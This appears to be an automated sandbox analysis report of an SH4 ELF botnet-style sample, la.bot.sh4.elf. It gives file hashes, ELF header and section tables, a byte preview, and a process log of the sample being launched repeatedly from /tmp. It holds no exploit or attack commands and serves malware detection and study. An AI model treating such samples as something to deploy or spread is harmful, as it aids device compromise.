      SHA1:47b5f25953c296e5ec9662bf8c409ba2c5e7d63b
      SHA256:dcbcd8d69b04ed426a4d2d8c1ce667bb1db4a9ac5dd80284e3ef00abf78316ec
      SHA512:f5b4787529ed5370efd03e86f61d2e2addacad76a72a913d0f403990d4361cabbc49996db63da2483ff58dbe38089d394add0a57363ea350c02a391ee9979993
      SSDEEP:1536:sOxPYrWcoDBGK277y8nz9bOvaf7z527OfFUCp/nzsT:sOsOx2Py8nFTz52KfFUan
      TLSH:D9636CA7C9642E28CA4CA474F030CB7D5F53A651CA562FE7C466D27A5143E88FC0DAF8
      File Content Preview:.ELF..............*.......@.4...........4. ...(...............@...@.4...4.....................A...A.`....E..........Q.td............................././"O.n........#.*@........#.*@l....o&O.n...l..............................././.../.a"O.!...n...a.b("...q.

      ELF header

      Class:ELF32
      Data:2's complement, little endian
      Version:1 (current)
      Machine:<unknown>
      Version Number:0x1
      Type:EXEC (Executable file)
      OS/ABI:UNIX - System V
      ABI Version:0
      Entry Point Address:0x4001a0
      Flags:0x9
      ELF Header Size:52
      Program Header Offset:52
      Program Header Size:32
      Number of Program Headers:3
      Section Header Offset:66464
      Section Header Size:40
      Number of Section Headers:10
      Header String Table Index:9
      NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
      NULL0x00x00x00x00x0000
      .initPROGBITS0x4000940x940x300x00x6AX004
      .textPROGBITS0x4000e00xe00xdd800x00x6AX0032
      .finiPROGBITS0x40de600xde600x240x00x6AX004
      .rodataPROGBITS0x40de840xde840x1eb00x00x2A004
      .ctorsPROGBITS0x4100000x100000x80x00x3WA004
      .dtorsPROGBITS0x4100080x100080x80x00x3WA004
      .dataPROGBITS0x4100140x100140x34c0x00x3WA004
      .bssNOBITS0x4103600x103600x42900x00x3WA004
      .shstrtabSTRTAB0x00x103600x3e0x00x0001
      TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
      LOAD0x00x4000000x4000000xfd340xfd346.98790x5R E0x10000.init .text .fini .rodata
      LOAD0x100000x4100000x4100000x3600x45f03.84630x6RW 0x10000.ctors .dtors .data .bss
      GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
      Skipped network analysis since the amount of network traffic is too extensive. Please download the PCAP and check manually.

      System Behavior

      Start time (UTC):06:33:04
      Start date (UTC):27/10/2024
      Path:/usr/bin/dash
      Arguments:-
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Start time (UTC):06:33:04
      Start date (UTC):27/10/2024
      Path:/usr/bin/rm
      Arguments:rm -f /tmp/tmp.kkU7CiqvTh /tmp/tmp.xQcxDpi09D /tmp/tmp.m2PO41jOJE
      File size:72056 bytes
      MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

      Start time (UTC):06:33:04
      Start date (UTC):27/10/2024
      Path:/usr/bin/dash
      Arguments:-
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Start time (UTC):06:33:04
      Start date (UTC):27/10/2024
      Path:/usr/bin/cat
      Arguments:cat /tmp/tmp.kkU7CiqvTh
      File size:43416 bytes
      MD5 hash:7e9d213e404ad3bb82e4ebb2e1f2c1b3

      Start time (UTC):06:33:04
      Start date (UTC):27/10/2024
      Path:/usr/bin/dash
      Arguments:-
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Start time (UTC):06:33:04
      Start date (UTC):27/10/2024
      Path:/usr/bin/head
      Arguments:head -n 10
      File size:47480 bytes
      MD5 hash:fd96a67145172477dd57131396fc9608

      Start time (UTC):06:33:04
      Start date (UTC):27/10/2024
      Path:/usr/bin/dash
      Arguments:-
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Start time (UTC):06:33:04
      Start date (UTC):27/10/2024
      Path:/usr/bin/tr
      Arguments:tr -d \\000-\\011\\013\\014\\016-\\037
      File size:51544 bytes
      MD5 hash:fbd1402dd9f72d8ebfff00ce7c3a7bb5

      Start time (UTC):06:33:04
      Start date (UTC):27/10/2024
      Path:/usr/bin/dash
      Arguments:-
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Start time (UTC):06:33:04
      Start date (UTC):27/10/2024
      Path:/usr/bin/cut
      Arguments:cut -c -80
      File size:47480 bytes
      MD5 hash:d8ed0ea8f22c0de0f8692d4d9f1759d3

      Start time (UTC):06:33:04
      Start date (UTC):27/10/2024
      Path:/usr/bin/dash
      Arguments:-
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Start time (UTC):06:33:04
      Start date (UTC):27/10/2024
      Path:/usr/bin/cat
      Arguments:cat /tmp/tmp.kkU7CiqvTh
      File size:43416 bytes
      MD5 hash:7e9d213e404ad3bb82e4ebb2e1f2c1b3

      Start time (UTC):06:33:04
      Start date (UTC):27/10/2024
      Path:/usr/bin/dash
      Arguments:-
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Start time (UTC):06:33:04
      Start date (UTC):27/10/2024
      Path:/usr/bin/head
      Arguments:head -n 10
      File size:47480 bytes
      MD5 hash:fd96a67145172477dd57131396fc9608

      Start time (UTC):06:33:04
      Start date (UTC):27/10/2024
      Path:/usr/bin/dash
      Arguments:-
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Start time (UTC):06:33:04
      Start date (UTC):27/10/2024
      Path:/usr/bin/tr
      Arguments:tr -d \\000-\\011\\013\\014\\016-\\037
      File size:51544 bytes
      MD5 hash:fbd1402dd9f72d8ebfff00ce7c3a7bb5

      Start time (UTC):06:33:04
      Start date (UTC):27/10/2024
      Path:/usr/bin/dash
      Arguments:-
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Start time (UTC):06:33:04
      Start date (UTC):27/10/2024
      Path:/usr/bin/cut
      Arguments:cut -c -80
      File size:47480 bytes
      MD5 hash:d8ed0ea8f22c0de0f8692d4d9f1759d3

      Start time (UTC):06:33:04
      Start date (UTC):27/10/2024
      Path:/usr/bin/dash
      Arguments:-
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Start time (UTC):06:33:04
      Start date (UTC):27/10/2024
      Path:/usr/bin/rm
      Arguments:rm -f /tmp/tmp.kkU7CiqvTh /tmp/tmp.xQcxDpi09D /tmp/tmp.m2PO41jOJE
      File size:72056 bytes
      MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

      Start time (UTC):06:33:11
      Start date (UTC):27/10/2024
      Path:/tmp/la.bot.sh4.elf
      Arguments:/tmp/la.bot.sh4.elf
      File size:4139976 bytes
      MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

      Start time (UTC):06:33:11
      Start date (UTC):27/10/2024
      Path:/tmp/la.bot.sh4.elf
      Arguments:-
      File size:4139976 bytes
      MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

      Start time (UTC):06:33:11
      Start date (UTC):27/10/2024
      Path:/tmp/la.bot.sh4.elf
      Arguments:-
      File size:4139976 bytes
      MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

      Start time (UTC):06:33:11
      Start date (UTC):27/10/2024
      Path:/tmp/la.bot.sh4.elf
      Arguments:-
      File size:4139976 bytes
      MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

      Start time (UTC):06:33:11
      Start date (UTC):27/10/2024
      Path:/tmp/la.bot.sh4.elf
      Arguments:-
      File size:4139976 bytes
      MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

      Start time (UTC):06:33:17
      Start date (UTC):27/10/2024
      Path:/tmp/la.bot.sh4.elf
      Arguments:-
      File size:4139976 bytes
      MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

      Start time (UTC):06:33:17
      Start date (UTC):27/10/2024
      Path:/tmp/la.bot.sh4.elf
      Arguments:-
      File size:4139976 bytes
      MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

      Start time (UTC):06:34:06
      Start date (UTC):27/10/2024
      Path:/tmp/la.bot.sh4.elf
      Arguments:-
      File size:4139976 bytes
      MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

      Start time (UTC):06:34:06
      Start date (UTC):27/10/2024
      Path:/tmp/la.bot.sh4.elf
      Arguments:-
      File size:4139976 bytes
      MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

      Start time (UTC):06:34:53
      Start date (UTC):27/10/2024
      Path:/tmp/la.bot.sh4.elf
      Arguments:-
      File size:4139976 bytes
      MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

      Start time (UTC):06:34:53
      Start date (UTC):27/10/2024
      Path:/tmp/la.bot.sh4.elf
      Arguments:-
      File size:4139976 bytes
      MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

      Start time (UTC):06:35:41
      Start date (UTC):27/10/2024
      Path:/tmp/la.bot.sh4.elf
      Arguments:-
      File size:4139976 bytes
      MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

      Start time (UTC):06:35:41
      Start date (UTC):27/10/2024
      Path:/tmp/la.bot.sh4.elf
      Arguments:-
      File size:4139976 bytes
      MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

      Start time (UTC):06:36:30
      Start date (UTC):27/10/2024
      Path:/tmp/la.bot.sh4.elf
      Arguments:-
      File size:4139976 bytes
      MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

      Start time (UTC):06:36:30
      Start date (UTC):27/10/2024
      Path:/tmp/la.bot.sh4.elf
      Arguments:-
      File size:4139976 bytes
      MD5 hash:8943e5f8f8c280467b4472c15ae93ba9